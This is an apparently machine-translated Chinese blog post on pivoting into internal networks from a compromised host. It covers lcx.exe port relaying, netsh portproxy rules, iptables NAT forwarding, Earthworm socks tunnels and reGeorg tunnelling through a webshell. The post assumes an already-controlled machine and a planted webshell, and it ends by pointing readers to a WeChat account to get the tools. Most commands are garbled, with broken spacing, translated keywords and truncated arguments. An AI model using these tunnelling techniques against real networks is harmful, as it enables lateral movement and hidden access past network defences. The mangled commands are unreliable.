内外网穿透工具,内网穿透解决方案
作者:yjddrjb
饱受信息安全之苦的新白帽。感谢您的关注。
本实验仅用于信息防御教育,请勿用于其他目的。
intranet的透明lcxnetshiptablesEarthworm蚯蚓端口重用reGeorg摘要
内部网渗透率
虽然我们想从外网穿透内网主机,但是内网很多主机并不直接连接外网,所以我们建立一个通道。
(假设你已经控制了一台主机,并通过那台主机渗透到其他内网主机。)
Win端口传输:lcx.exe netsh
Linux端口转发:端口映射iptables
多平台:蚯蚓
端口重用:reGeorg
lcwin平台的老工具。
很好用,但是放在家里的桶里)
端口转发(监听和从机)lcx . exe-监听8080 8081//端口lcx . exe-从机192 . 168 . 1 . 158686868686
运行cmd
要在//xp上安装IPv6 netsh接口IPv6 install并打开防火墙,必须释放tcp端口。
//设置规则v4tov4访问端口192.168.1.132:6666,端口192.168.1.128:3389,nethinterfaceportproxysetv4到V4Liv4。
网络接口portproxydelete4到v4监听地址=192.168.1.132监听端口=3389显示了现有配置。
网络接口portproxyshowv4到v4网络接口portproxyshowalliptableslinux的端口转发
打开内核转发
1/echo/proc/sys/net/IP v4/IP _ forwardsysctl-p配置端口传输
//转发代理/192.168.1。访问131:8888 192 . 168 . 1 . 128:80 IPTables-TNAT-A预路由-DST 192.168.1.131-PTCP后路由-DST 192.168 iptables-tnat-a预路由-PTCP-mtcp-dport 888-jdn at-to-destination 192 . 168 . 1 . 128:80 IPTables-.16-d 192 . 168 . 1 . 128-ptcp-mtcp-d port 80-jsnat-to-source 192 . 168 . 1 . 131/iptables-tnat-本地端口之间的pap
//ew _ win32 . exe-socksd-l 8082//直接成为socks5代理服务器//ew _ win32 . exe-srcsocks-l 8081-e 8082//当本地8082端口等待内网访问本地8081时,发送内网ew _ win32.exe-srssocks-d192。
(服务器只开了80个端口,适合数据输入输出。)
(因为有很好的隐藏后门,所以不需要开端口))。
它是用reGeorg Python2.7编写的工具,配合Webshell从80个端口进行传输。
支持多种语言
github.com/sense邮报3359号/乔治
2 python regorgsocksoproxy.py-l监听地址-p本地服务监听的端口-u Webshell地址python 2 regeorgsocksproxy . py-l l 192.168 . u汇总p后,可以在浏览器中添加代理,或者使用socks5工具等配置全局代理。
获取工具
微信官方账号:
XGyjddrjb
回复: